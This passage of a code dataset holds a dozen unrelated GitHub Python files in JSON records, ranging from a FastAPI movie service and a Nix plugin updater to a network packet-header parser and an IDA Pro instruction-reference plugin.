recipe_model\n self.recommendation_parser = recommendation_parser\n self.recipe_parser = recipe_parser\n self.prompt_factory = PromptFactory(self.settings)\n self.recommendation_prompt = recommendation_prompt_template\n self.recipe_prompt = recipe_prompt_template\n\n def execute_recommendation_prompt(self, prompt_template, query):\n formatted_prompt = prompt_template.format_prompt(query=query)\n output = self.reccomendation_model(formatted_prompt.to_string())\n return output\n \n def execute_recipe_prompt(self, prompt_template, query):\n formatted_prompt = prompt_template.format_prompt(query=query)\n output = self.recipe_model(formatted_prompt.to_string())\n return output \n\n def get_recommendation(self, day):\n rec_query = self.prompt_factory.create_recommendation_prompt()\n rec_output = 
self.execute_recommendation_prompt(self.recommendation_prompt, rec_query)\n recommendation = self.recommendation_parser.parse(rec_output)\n return recommendation\n\n def get_recipe(self, recommendation):\n ing_query = self.prompt_factory.create_recipe_information_template(recommendation)\n ing_output = self.execute_recipe_prompt(self.recipe_prompt, ing_query)\n recipe = self.recipe_parser.parse(ing_output)\n return recipe","repo_name":"mgarcia4609/AI-La-Carte","sub_path":"models/recipe_assistant.py","file_name":"recipe_assistant.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30850790369","text":"from PyCamellia import *\nfrom SolutionFns import *\n\nspaceDim = 2\ndims = [1.0,1.0]\nnumElements = [2,2]\npolyOrder = 3\ndt = 0.1\ntotalTime = 2.0\n\nform = transientLinearInit(spaceDim, dims, numElements, polyOrder, dt)\n\ntopBoundary = SpatialFilter.matchingY(1.0)\nnotTopBoundary = SpatialFilter.negatedFilter(topBoundary)\ntimeRamp = TimeRamp.timeRamp(form.getTimeFunction(),1.0)\nx = Function.xn(1)\nrampWidth = 1./64\nH_left = Function.heaviside(rampWidth)\nH_right = Function.heaviside(1.0-rampWidth);\nramp = (1-H_right) * H_left + (1./rampWidth) * (1-H_left) * x + (1./rampWidth) * H_right * (1-x)\n\nzero = Function.constant(0)\ntopVelocity = Function.vectorize(ramp,zero)\n\n\nform = addWall(form, notTopBoundary)\nform = addInflow(form, topBoundary, timeRamp * topVelocity)\n\nform = transientLinearSolve(form, totalTime, dt)\n","repo_name":"kellybreedlove/phase2","sub_path":"transientLinearTest.py","file_name":"transientLinearTest.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30320731318","text":"from sys import argv\nimport json\nimport time\n\nfrom utils.raw_obj.raw_obj import get_raw_obj\nfrom utils.parsers.parse_obj import parse_raw_obj\n\nINPUT = argv[1] + '.tsv'\n\nprint('Input: ', INPUT)\n\nOUTPUT_REVISIONS = \"revisions.json\"\nOUTPUT_PAGES = \"pages.json\"\nOUTPUT_USERS = \"users.json\"\n\nprint('Start: ', time.time())\n\nwith open(INPUT, 'r') as file, open(OUTPUT_REVISIONS, 'w') as revisions, open(OUTPUT_PAGES, 'w') as pages, open(OUTPUT_USERS, 'w') as users:\n for line in file:\n remove_newline = line[0:(len(line) - 1)]\n parts = remove_newline.split('\\t')\n raw_obj = get_raw_obj(parts)\n (type, result) = parse_raw_obj(raw_obj)\n if type == 'revision':\n revision = json.dumps(result)\n revisions.write(revision)\n revisions.write('\\n')\n elif type == 'page':\n page = json.dumps(result)\n pages.write(page)\n pages.write('\\n')\n elif type == 'user':\n user = json.dumps(result)\n users.write(user)\n users.write('\\n')\n\nprint('Finish: ', time.time())\n","repo_name":"WikiCommunityHealth/wikimedia-history-import","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26616082083","text":"N, D, H = map(int, input().split())\nans = 0\n\n\ndef f(x_, y_, x=0):\n y = (y_ - H) * (x - D) / (x_ - D) + H\n return y\n\n\nfor i in range(N):\n d, h = map(int, input().split())\n ans = max(ans, f(d, 
h))\n\n\nprint(f\"{ans:.20f}\")\n","repo_name":"mei28/Competitive-programing","sub_path":"zone2021/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26493792151","text":"#!/usr/bin/env nix-shell\n#!nix-shell update-shell.nix -i python3\n\n# format:\n# $ nix run nixpkgs.python3Packages.black -c black update.py\n# type-check:\n# $ nix run nixpkgs.python3Packages.mypy -c mypy update.py\n# linted:\n# $ nix run nixpkgs.python3Packages.flake8 -c flake8 --ignore E501,E265,E402 update.py\n\nimport inspect\nimport os\nimport sys\nfrom typing import List, Tuple\nfrom pathlib import Path\n\n# Import plugin update library from maintainers/scripts/pluginupdate.py\nROOT = Path(os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))) # type: ignore\nsys.path.insert(\n 0, os.path.join(ROOT.parent.parent.parent.parent.parent, \"maintainers\", \"scripts\")\n)\nimport pluginupdate\n\nGET_PLUGINS = f\"\"\"(with import {{}};\nlet\n inherit (kakouneUtils.override {{}}) buildKakounePluginFrom2Nix;\n generated = callPackage {ROOT}/generated.nix {{\n inherit buildKakounePluginFrom2Nix;\n }};\n hasChecksum = value: lib.isAttrs value && lib.hasAttrByPath [\"src\" \"outputHash\"] value;\n getChecksum = name: value:\n if hasChecksum value then {{\n submodules = value.src.fetchSubmodules or false;\n sha256 = value.src.outputHash;\n rev = value.src.rev;\n }} else null;\n checksums = lib.mapAttrs getChecksum generated;\nin lib.filterAttrs (n: v: v != null) checksums)\"\"\"\n\nHEADER = \"# This file has been generated by ./pkgs/applications/editors/kakoune/plugins/update.py. Do not edit!\"\n\nclass KakouneEditor(pluginupdate.Editor):\n\n\n def generate_nix(self, plugins: List[Tuple[pluginupdate.PluginDesc, pluginupdate.Plugin]], outfile: str):\n sorted_plugins = sorted(plugins, key=lambda v: v[1].name.lower())\n\n with open(outfile, \"w+\") as f:\n f.write(HEADER)\n f.write(\n \"\"\"\n{ lib, buildKakounePluginFrom2Nix, fetchFromGitHub, overrides ? 
(self: super: {}) }:\nlet\npackages = ( self:\n{\"\"\"\n )\n for pluginDesc, plugin in sorted_plugins:\n f.write(\n f\"\"\"\n {plugin.normalized_name} = buildKakounePluginFrom2Nix {{\n pname = \"{plugin.normalized_name}\";\n version = \"{plugin.version}\";\n src = {pluginDesc.repo.as_nix(plugin)};\n meta.homepage = \"{pluginDesc.repo.url(\"\")}\";\n }};\n\"\"\"\n )\n f.write(\n \"\"\"\n});\nin lib.fix' (lib.extends overrides packages)\n\"\"\"\n )\n print(f\"updated {outfile}\")\n\n\ndef main():\n editor = KakouneEditor(\"kakoune\", ROOT, GET_PLUGINS)\n editor.run()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"NixOS/nixpkgs","sub_path":"pkgs/applications/editors/kakoune/plugins/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","stars":13695,"dataset":"github-code","pt":"37"} +{"seq_id":"5571410456","text":"import argparse\nimport sys\nimport MySQLdb\nimport MySQLdb.cursors\nimport logging\n\ndb\t\t\t= MySQLdb.connect( host=\"127.0.0.1\", port=3306, user=\"root\",\n passwd=\"root\", db=\"watchman\",\n cursorclass=MySQLdb.cursors.DictCursor )\n\nconn\t\t\t= db.cursor()\n\ndef split_data():\n get_query\t\t= \"\"\"select * from chronicle\"\"\"\n conn.execute( get_query )\n\n query\t\t= conn.fetchall()\n \n for data in query:\n data_split\t\t= data['intro_text'].split('\\n\\n', 1)\n chron_id \t\t= int( data['id'] )\n title\t\t\t= data['title']\n intro\t\t\t= data_split[ 0 ]\n try:\n # Update the 'intro_text'\n update_intro\t= \"\"\"update chronicle set `intro_text` = %s where id = '%s' \"\"\"\n conn.execute( update_intro, ( intro, chron_id ))\n db.commit()\n\n # Remove the
<br> from the 'full_text'\n            # new_ftext\t\t= ''.join( data_split )\n            # update_full\t\t= \"\"\"update chronicle set `full_text` = %s where id = '%s' \"\"\"\n            # conn.execute( update_full, ( new_ftext, chron_id ))\n            # db.commit()\n            \n        except MySQLdb.IntegrityError:\n            logging.warn(\"failed to update values %d, %s\", chronicle_id, title )\n\nsplit_data()\n\n# Useful scripts not yet implemented automatically >>>\n\n# update chronicle set `intro_text` = replace(`intro_text`, \"
<br><br>\", \"<br> <br>\");\n# update chronicle set `intro_text` = concat(`intro_text`, \"<br><br>
\");\n\n# update chronicle set `intro_text` = null\n\n","repo_name":"WatchmanOnTheWall/watchman","sub_path":"data-split.py","file_name":"data-split.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26444037751","text":"import json\nimport logging\n\nfrom pynamodb.exceptions import DeleteError, DoesNotExist\n\n\n# TODO add pagination\n# TODO return just the columns needed, vs everything; use an index\ndef ls(model):\n \"\"\"Return all of the organizations in the DB.\"\"\"\n results = model.scan()\n print(results)\n\n return {\n 'statusCode': 200,\n 'body': json.dumps({'items': [dict(r) for r in results]})\n }\n\n\n# TODO don't add dupe\ndef create(model, body):\n entry = model(**body)\n entry.save()\n\n return {\n 'statusCode': 201\n }\n\n\n# TODO make use of the batch operations\n# https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_BatchWriteItem.html\n# def create_many(model, body):\n# with model.batch_write() as batch:\n# entry = model(**body)\n# batch.save(entry)\n#\n# return {\n# 'statusCode': 201\n# }\n\n\ndef retrieve(model, key):\n try:\n entry = model.get(hash_key=key)\n except DoesNotExist:\n return {\n 'statusCode': 404,\n 'body': json.dumps({'error_message': f\"'{key}' not found\"})\n }\n\n return {\n 'statusCode': 200,\n 'body': json.dumps(dict(entry))\n }\n\n\n# TODO check for duplicate org name + fail\ndef update(model, key, body):\n try:\n entry = model.get(hash_key=key)\n except DoesNotExist:\n return {\n 'statusCode': 404,\n 'body': json.dumps({'error_message': f\"'{key}' not found\"})\n }\n\n keys_changed = False\n fields_changed = False\n\n for k in entry:\n if k in body and body[k] != entry[k]:\n setattr(entry, k, body[k])\n fields_changed = True\n\n # If there are new fields, perform the update\n for k in body:\n if k == 'id': # This assumes that 'id' is the only Dynamo primary key\n keys_changed = True\n if k not in entry:\n setattr(entry, k, body[k])\n fields_changed = True\n\n if fields_changed:\n entry.save()\n if keys_changed:\n delete(model, key)\n else:\n logging.info('Nothing changed, not updating')\n\n return {\n 'statusCode': 200\n }\n\n\ndef delete(model, key):\n try:\n entry = model.get(hash_key=key)\n except DoesNotExist:\n return {\n 'statusCode': 404,\n 'body': json.dumps({'error_message': f\"'{key}' not found\"})\n }\n\n try:\n entry.delete()\n except DeleteError:\n return {\n 'statusCode': 400,\n 'body': json.dumps({'error_message': f\"Unable to delete '{key}'\"})\n }\n\n return {\n 'statusCode': 204\n }\n","repo_name":"good-emporium/web-api","sub_path":"functions/dynamodb.py","file_name":"dynamodb.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"21522448781","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"Script to balance expenses among a group of people.\n\nProvided a list of 'persons' and a list of 'positions', this script shows the\naccounts stating the individuals total contribution. 
To even out the balances\na suggestion of money transfer is provided.\n\nThis script can be called upon a json file providing the two data sets.\nSee the README.txt for more information on the data format.\n\"\"\"\n# -----------------------------------------------------------------------------\n# The full license is in the file LICENSE, distributed with this code.\n#\n# REFERENCES:\n# https://github.com/strohmch/moneyhandler\n# -----------------------------------------------------------------------------\n\nimport json\nimport sys\n\ncurrency = \"EUR\"\n\n\ndef calc_accounts(persons, positions):\n \"\"\"Calculates the persons' accounts with due positions (sorted).\"\"\"\n\n balances = [0] * len(persons)\n\n for pos in positions:\n assert len(persons) == len(pos)\n\n # persons obligated to contribute\n con = [i for i, c in enumerate(pos) if c >= 0]\n\n # total expense on position\n expense = sum(pos[i] for i in con)\n\n share = expense / len(con)\n\n # calculate balance\n for i in con:\n balances[i] += pos[i] - share\n\n # sort the persons according to their balances from dept to claim\n accounts = sorted(zip(persons, balances), key=lambda x: x[1])\n\n return accounts\n\n\ndef suggested_actions(accounts):\n \"\"\"Suggests actions to balance sorted accounts.\"\"\"\n\n # the following algorithm provides a suggestion of how to balance the accounts\n persons_s, balances_s = zip(*accounts)\n baltmp = list(balances_s)\n\n # the actions of transactions are stored here\n actions = []\n\n for i in range(len(baltmp)):\n if not baltmp[i] < 0:\n break\n\n for j in range(len(baltmp) - 1, i, -1):\n if not baltmp[j] > 0:\n continue\n\n if baltmp[j] + baltmp[i] >= 0:\n bal_to_trans = baltmp[i]\n else:\n bal_to_trans = -baltmp[j]\n\n actions.append([i, j, -bal_to_trans])\n baltmp[i] -= bal_to_trans\n baltmp[j] += bal_to_trans\n\n if baltmp[i] == 0:\n break\n\n return actions\n\n\ndef main(filename):\n \"\"\"Main script running on jason file named \"filename'\"\"\"\n\n # read the json file with input data\n with open(filename, mode=\"r\") as f:\n data = json.load(f)\n\n # calculate the according sorted accounts\n accounts = calc_accounts(data['persons'], data['positions'])\n\n for pers, bal in accounts:\n print(f'{pers}: {bal:.2f} {currency}')\n print(\"=\" * 80)\n\n # obtain suggested actions\n actions = suggested_actions(accounts)\n\n persons_s = list(zip(*accounts))[0]\n\n for i, j, bal in actions:\n print(f'{persons_s[i]} transfers to {persons_s[j]}: {bal:.2f} {currency}')\n\n\nif __name__ == '__main__':\n\n if len(sys.argv) > 1:\n json_filename = sys.argv[1]\n else:\n json_filename = \"2020_summer_vacation.json\"\n print(f\"Got no input, using the example json file: {json_filename}\")\n\n main(json_filename)\n","repo_name":"strohmch/moneyhandler","sub_path":"moneyhandler.py","file_name":"moneyhandler.py","file_ext":"py","file_size_in_byte":3195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33847060385","text":"from fastapi import FastAPI, Depends\nfrom keycloak import KeycloakOpenID\nfrom fastapi.security import OAuth2PasswordBearer\nfrom fastapi.middleware.cors import CORSMiddleware\n\n# psql -U userpd -W dbesiee(database name), then enter password\n# \\dt : show all tables\n# TABLE tablename(or select * from tablename) : show all records of table\nfrom models.database import BaseSQL, engine, SessionLocal\nfrom models import models\nfrom routers import user, movie\nfrom services import movie as movie_service\n\napp = FastAPI()\n\n\n# 
front url\norigins = [\n \"http://localhost\",\n \"http://localhost:5050\",\n \"http://localhost:5050/#/movie/list\",\n \"http://localhost:5050/#/movie/search\",\n \"http://localhost:5050/#/\",\n]\n\n# fastapi allow cross-domain\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n\n@app.get(\"/\")\ndef read_root():\n return {\"Hello\": \"World_first\"}\n\n\napp.include_router(user.router)\napp.include_router(movie.router)\n\n\n@app.on_event(\"startup\")\nasync def startup_event():\n BaseSQL.metadata.create_all(bind=engine)\n db = SessionLocal()\n try:\n db.query(models.movie_model).delete()\n db.commit()\n except:\n db.rollback()\n movie_service.store_to_db(db=db, filename='imdb_movies.csv')\n\n\n# # authentication\n# oauth2_scheme = OAuth2PasswordBearer(tokenUrl=\"token\")\n#\n# # Configure client\n# keycloak_openid = KeycloakOpenID(server_url=\"http://localhost:8080/auth/\",\n# client_id=\"fastapi\",\n# realm_name=\"master\",\n# client_secret_key=\"be49e1f0-922d-4c06-8f61-d5ad3a46f896\")\n#\n#\n# @app.get(\"/protected\", tags=[\"authentication\"])\n# def protected(token: str = Depends(oauth2_scheme)):\n# return {\n# \"Hello\": \"World\",\n# \"user_infos\": token\n# }\n\n","repo_name":"xul-ops/DSIA_projet_fullstack_application","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7829947907","text":"from cta_db import datastructures as cta\nfrom copy import deepcopy\nimport pickle\nimport datetime as dt\nimport platform\n\na1 = cta.animal('RN5')\na1.dob = dt.datetime.strptime('10/10/18','%m/%d/%y')\n\na1.add_pre_op('Handling',date = '3/9/19 13:00')\na1.add_pre_op('Handling',date = '3/10/19 13:30')\na1.add_pre_op('Box Habituation',date = '3/11/19 13:00')\na1.add_pre_op('Box Habituation','He hates it','3/12/19 14:00')\n\ns1 = cta.mouse_surgery('BLA_cre_implant',pre_weight=34.2,post_weight=36,date='3/13/19',num_ch=31)\na1.add_surgery(s1)\n\ni1 = cta.ioc_test('Habituation')\ni1.set_test_time('3/22/19 13:30')\ni1['Weight'] = 33.2\ni1.calibration([8],[18.8])\na1.add_ioc_test(i1)\n\ni2 = cta.ioc_test('Taste Array')\ni2.set_test_time('3/23/19 13:30')\ni2['Weight'] = 31.4\ni2.calibration([8,9,9,7],[18.4,19.6,20,18.8])\ni2.set_rec_info('RN5_4taste_preCTA_190323',cta.ioc_test.rec_defaults['array'])\na1.add_ioc_test(i2)\n\ni3 = cta.ioc_test('CTA Train')\ni3.set_test_time('3/24/19 13:00')\ni3['Weight'] = 31.3\ni3.calibration([8],[19.1])\ni3.set_rec_info('RN5_ctaTrain_190324')\ni3.set_injection_details('13:30',0.56)\na1.add_ioc_test(i3)\n\ni4 = deepcopy(i2)\ni4.set_test_time('3/25/19 14:00')\ni4.set_rec_info('RN5_4taste_postCTA_190325')\ni4.calibration([8,9,9,7],[18.4,19.8,19.6,18])\na1.add_ioc_test(i4)\n\ni5 = cta.ioc_test('CTA Test')\ni5.set_test_time('3/25/19 12:30')\ni5['Weight'] = 30.8\ni5.set_rec_info('RN5_SaccTest_190325')\ni5.calibration([8],[18.6])\na1.add_ioc_test(i5)\n\na1.add_bottle_test(55.6,54.7,'3/20/19 20:00')\na1.add_bottle_test(60.1,59.0,'3/21/19 20:00')\na1.add_bottle_test(62.2,61.3,'3/22/19 20:00')\na1.add_bottle_test(58.4,57.9,'3/23/19 20:00')\na1.add_bottle_test(54.7,54.1,'3/24/19 20:30','Saccharin 0.2M')\n\na2 = deepcopy(a1)\na2.ID='RN6'\na2.surgery[0].add_comment('Gave 0.5cc Ringers after')\na2.surgery[0].add_comment('Super active an hour after')\n\ntmp_path = 'data/'\nf1 = tmp_path+'RN5_metadata.p'\nwith open(f1,'wb') as f:\n 
pickle.dump(a1,f)\nwith open(f1.replace('5','6'),'wb') as f:\n pickle.dump(a2,f)\nanim_db = {platform.node():{a1.ID:tmp_path+'RN5_metadata.p',a2.ID:tmp_path+'RN6_metadata.p'}}\nwith open('data/cta_anim_db.p','wb') as f:\n pickle.dump(anim_db,f)\n","repo_name":"nubs01/CTA_ExpDB","sub_path":"tests/test_script.py","file_name":"test_script.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"7884877777","text":"\ndef overlap_area(rect_1, rect_2):\n x_start = max(rect_1[0][0], rect_2[0][0])\n x_end = min(rect_1[1][0], rect_2[1][0])\n\n if x_start >= x_end:\n return 0\n\n y_start = max(rect_1[0][1], rect_2[0][1])\n y_end = min(rect_1[1][1], rect_2[1][1])\n\n if y_start >= y_end:\n return 0\n\n return (x_end - x_start) * (y_end - y_start)\n\nif __name__ == \"__main__\":\n rect_1 = [[2, 2], [4, 4]]\n rect_2 = [[5, 2], [8, 4]]\n print(overlap_area(rect_1, rect_2))\n","repo_name":"pkrishn6/problems","sub_path":"api/rect.py","file_name":"rect.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12158375869","text":"import variables\n\n\ndef analyse():\n variables.ethernet_header = variables.pack_con[0:14]\n variables.ip_header = variables.pack_con[14:34]\n type_judge = variables.pack_con[23]\n if type_judge == '06':\n variables.tcp_header = variables.pack_con[34:54]\n elif type_judge == '11':\n variables.udp_header = variables.pack_con[34:42]\n\n variables.des_mac_addr = ':'.join(str(b) for b in variables.ethernet_header[0:6])\n variables.src_mac_addr = ':'.join(str(b) for b in variables.ethernet_header[6:12])\n variables.protocol_type = ':'.join(str(b) for b in variables.ethernet_header[12:14])\n variables.ip_version = ''\n if variables.ip_header[0] == '45':\n variables.ip_version = '4'\n else:\n variables.ip_version = '6'\n variables.ip_header_length = '20'\n\n variables.diff_service = variables.ip_header[1]\n variables.ip_total_length = str(int(variables.ip_header[2] + variables.ip_header[3], 16))\n variables.ip_identification = variables.ip_header[4] + variables.ip_header[5]\n variables.ip_flags = variables.ip_header[6]\n variables.ip_header_check_sum = \"0x\" + variables.ip_header[10] + variables.ip_header[11]\n variables.ip_alive_time = str(int(variables.ip_header[8], 16))\n if variables.ip_header[9] == \"06\":\n variables.ip_in_trans_protocol = \"TCP\"\n else:\n variables.ip_in_trans_protocol = \"UDP\"\n\n variables.ip_src_ip_adrr = '.'.join(str(int(con, 16)) for con in variables.ip_header[12:16])\n variables.ip_des_ip_adrr = '.'.join(str(int(con, 16)) for con in variables.ip_header[16:20])\n if variables.ip_in_trans_protocol == \"TCP\":\n variables.tcp_src_port = str(int(variables.tcp_header[0] + variables.tcp_header[1], 16))\n variables.tcp_des_port = str(int(variables.tcp_header[2] + variables.tcp_header[3], 16))\n variables.tcp_serial_num = str(\n int(variables.tcp_header[4] + variables.tcp_header[5] + variables.tcp_header[6] + variables.tcp_header[7],\n 16))\n variables.tcp_ack_num = str(\n int(variables.tcp_header[8] + variables.tcp_header[9] + variables.tcp_header[10] + variables.tcp_header[11],\n 16))\n\n bin_str = \"{0:b}\".format(int(variables.tcp_header[12] + variables.tcp_header[13]), 16)\n\n variables.tcp_header_length = str(int(bin_str[0:4], 2)) + bin_str[0:4]\n variables.tcp_reserved_segment = bin_str[4:10]\n\n variables.tcp_identification = bin_str[10:16]\n 
variables.tcp_window_size = str(int(variables.tcp_header[8] + variables.tcp_header[9], 16))\n variables.tcp_check_sum = \"0x\" + variables.tcp_header[10] + variables.tcp_header[11]\n variables.tcp_urg_pointer = variables.tcp_header[12] + variables.tcp_header[13]\n variables.tcp_opt_segment = ''\n\n\n elif variables.ip_in_trans_protocol == \"UDP\":\n variables.udp_src_port = str(int(variables.udp_header[0] + variables.udp_header[1], 16))\n variables.udp_des_port = str(int(variables.udp_header[2] + variables.udp_header[3], 16))\n variables.udp_length = str(int(variables.udp_header[4] + variables.udp_header[5], 16))\n variables.udp_check_sum = \"0x\" + variables.udp_header[6] + variables.udp_header[7]\n\n\ndef connect_info():\n ethernet_info = \"-------------------------------帧信息-------------------------------\\n\" + \"源MAC地址:\" + variables.src_mac_addr + \"\\n目的MAC地址:\" + variables.des_mac_addr + \"\\n协议类型:\" + variables.protocol_type\n tcp_info = \"\"\n udp_info = \"\"\n type_judge = variables.pack_con[23]\n ip_info = \"\\n---------------------------- IP头部信息-----------------------------\\n\" + \"IP头部长度:\" + variables.ip_header_length + \\\n \"\\nIP版本号:\" + variables.ip_version + \"\\n区分服务: \" + \\\n variables.diff_service + \"\\nIP数据包总长度:\" + variables.ip_total_length + \"\\n标识位:\" + variables.ip_identification + \\\n \"\\n标志:\" + variables.ip_flags + \"\\n首部校验和:\" + variables.ip_header_check_sum + \"\\n生存时间:\" + variables.ip_alive_time + \\\n \"\\n传输层协议:\" + variables.ip_in_trans_protocol + \"\\n源IP地址:\" + variables.ip_src_ip_adrr + \"\\n目的IP地址:\" + variables.ip_des_ip_adrr\n\n if variables.ip_in_trans_protocol == \"TCP\":\n tcp_info = \"\\n----------------------------传输层协议信息--------------------------\\n\" + \"协议类型: TCP\\n\" + \\\n \"源端口号: \" + variables.tcp_src_port + \"\\n目的端口号: \" + variables.tcp_des_port + \\\n \"\\n序列号: \" + variables.tcp_serial_num + \"\\n确认号: \" + variables.tcp_ack_num + \\\n \"\\nTCP头部长: \" + variables.tcp_header_length + \"\\n保留字段: \" + variables.tcp_reserved_segment + \\\n \"\\n标志位: \" + variables.tcp_identification + \"\\n窗口大小: \" + variables.tcp_window_size + \\\n \"\\n校验和: \" + variables.tcp_check_sum + \"\\n紧急指针: \" + variables.tcp_urg_pointer + \\\n \"\\n选项字段: \" + variables.tcp_opt_segment\n variables.trans_layer_protocl = tcp_info\n elif variables.ip_in_trans_protocol == \"UDP\":\n udp_info = \"\\n----------------------------传输层协议信息--------------------------\\n\" + \"协议类型: UDP\\n\" + \\\n \"源端口号: \" + variables.udp_src_port + \"\\n目的端口号: \" + variables.udp_des_port + \"\\n长度: \" + variables.udp_length + \\\n \"\\nUDP校验和: \" + variables.udp_check_sum\n variables.trans_layer_protocl = udp_info\n variables.analyse_info = ethernet_info + ip_info + variables.trans_layer_protocl\n","repo_name":"GokiePeter/UCAS-Software-and-System-Security-Network-Sniffer","sub_path":"analyse_data.py","file_name":"analyse_data.py","file_ext":"py","file_size_in_byte":5635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43361450437","text":"import time, threading\nimport sqlite3 as sq\nimport os\nimport inspect\nimport glob\nimport idaapi\nfrom idc import print_insn_mnem, get_screen_ea\nfrom ida_kernwin import ask_long, find_widget, close_widget, ask_str\n\n\ninitialized = False\ninsref_g = None\n# we try because of ida versions below 6.8, and write action handlers below\ntry:\n\n class StopHandler(idaapi.action_handler_t):\n def __init__(self):\n idaapi.action_handler_t.__init__(self)\n\n def activate(self, ctx):\n b = 
idaref_plugin_t()\n b.stop()\n return 1\n\n # This action is always available.\n def update(self, ctx):\n return idaapi.AST_ENABLE_ALWAYS\n\n\nexcept AttributeError:\n pass\n\ntry:\n\n class StartHandler(idaapi.action_handler_t):\n def __init__(self):\n idaapi.action_handler_t.__init__(self)\n\n def activate(self, ctx):\n b = idaref_plugin_t()\n b.start()\n return 1\n\n # This action is always available.\n def update(self, ctx):\n return idaapi.AST_ENABLE_ALWAYS\n\n\nexcept AttributeError:\n pass\n\n\nclass InstructionReference(idaapi.simplecustviewer_t):\n def __init__(self, owner):\n super(InstructionReference, self).__init__()\n self.owner = owner\n self.ref_term = False\n self.inst_map = {}\n self.last_inst = None\n self.is_loaded = False\n self.do_auto = True\n\n self.menu_update = None\n self.menu_lookup = None\n self.menu_autorefresh = None\n self.change_arch = None\n\n self.title = \"Instruction Reference\"\n self.destroying = False\n\n self.base_path = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\n\n self.archs = self.findManuals()\n\n print(\"available architectures %s\" % str(self.archs))\n\n self.create()\n self.loadArchitecture(self.getIdaArchitecture())\n\n def create(self):\n if find_widget(self.title) == None:\n if not idaapi.simplecustviewer_t.Create(self, self.title):\n print(\"Unable to open\")\n return False\n\n if idaapi.IDA_SDK_VERSION >= 700:\n self.menu_update = 1\n self.menu_lookup = 2\n self.menu_autorefresh = 3\n self.change_arch = 4\n\n class Hooks(idaapi.UI_Hooks):\n class PopupActionHandler(idaapi.action_handler_t):\n def __init__(self, owner, menu_id):\n self.owner = owner\n self.menu_id = menu_id\n\n def activate(self, ctx):\n self.owner.OnPopupMenu(self.menu_id)\n\n def update(self, ctx):\n return idaapi.AST_ENABLE_ALWAYS\n\n def __init__(self, form):\n idaapi.UI_Hooks.__init__(self)\n self.form = form\n\n def finish_populating_widget_popup(self, widget, popup):\n if self.form.title == idaapi.get_widget_title(widget):\n idaapi.attach_dynamic_action_to_popup(\n widget,\n popup,\n idaapi.action_desc_t(\n None, \"Update View\", self.PopupActionHandler(self.form, self.form.menu_update), None, None, -1\n ),\n )\n idaapi.attach_dynamic_action_to_popup(\n widget,\n popup,\n idaapi.action_desc_t(\n None,\n \"Lookup Instruction\",\n self.PopupActionHandler(self.form, self.form.menu_lookup),\n None,\n None,\n -1,\n ),\n )\n idaapi.attach_dynamic_action_to_popup(\n widget,\n popup,\n idaapi.action_desc_t(\n None,\n \"Toggle Auto-refresh\",\n self.PopupActionHandler(self.form, self.form.menu_autorefresh),\n None,\n None,\n -1,\n ),\n )\n idaapi.attach_action_to_popup(widget, popup, \"-\", None)\n idaapi.attach_dynamic_action_to_popup(\n widget,\n popup,\n idaapi.action_desc_t(\n None,\n \"Change Architecture\",\n self.PopupActionHandler(self.form, self.form.change_arch),\n None,\n None,\n -1,\n ),\n )\n idaapi.attach_action_to_popup(widget, popup, \"-\", None)\n\n self.hooks = Hooks(self)\n self.hooks.hook()\n else:\n self.menu_update = self.AddPopupMenu(\"Update View\")\n self.menu_lookup = self.AddPopupMenu(\"Lookup Instruction\")\n self.menu_autorefresh = self.AddPopupMenu(\"Toggle Auto-refresh\")\n self.change_arch = self.AddPopupMenu(\"Change Architecture\")\n\n self.Show()\n\n def update():\n if self.destroying == True:\n return -1\n else:\n if self.do_auto:\n self.update()\n\n return 200\n\n if \"register_timer\" in dir(idaapi):\n idaapi.register_timer(200, update)\n\n self.is_loaded = True\n else:\n print(\"Sorry I can't support 
auto-refresh in your version of IDA.\")\n print(\"Use 'ref.update()' to get documentation for your instruction.\")\n else:\n print(\"Already loaded. Please close old instance first.\")\n\n def destroy(self):\n self.destroying = True\n self.is_loaded = False\n self.hooks.unhook()\n window = find_widget(self.title)\n\n if window:\n close_widget(window, 0)\n\n def findManuals(self):\n search_path = os.path.join(self.base_path, \"archs\", \"*.sql\")\n doc_opts = glob.glob(search_path)\n\n if len(doc_opts) == 0:\n Warning(\"Couldn't find any databases in \" + search_path)\n return\n\n available = []\n\n for c in doc_opts:\n basefile = os.path.splitext(os.path.basename(c))[0]\n available.append(basefile)\n\n return available\n\n def askArchitecture(self, availList):\n prompt = [\"What platform do you want to use?\"]\n\n i = 1\n for arch in availList:\n prompt.append(\"%d - %s\" % (i, arch))\n i = i + 1\n\n sel = ask_long(1, \"\\n\".join(prompt))\n\n if sel is 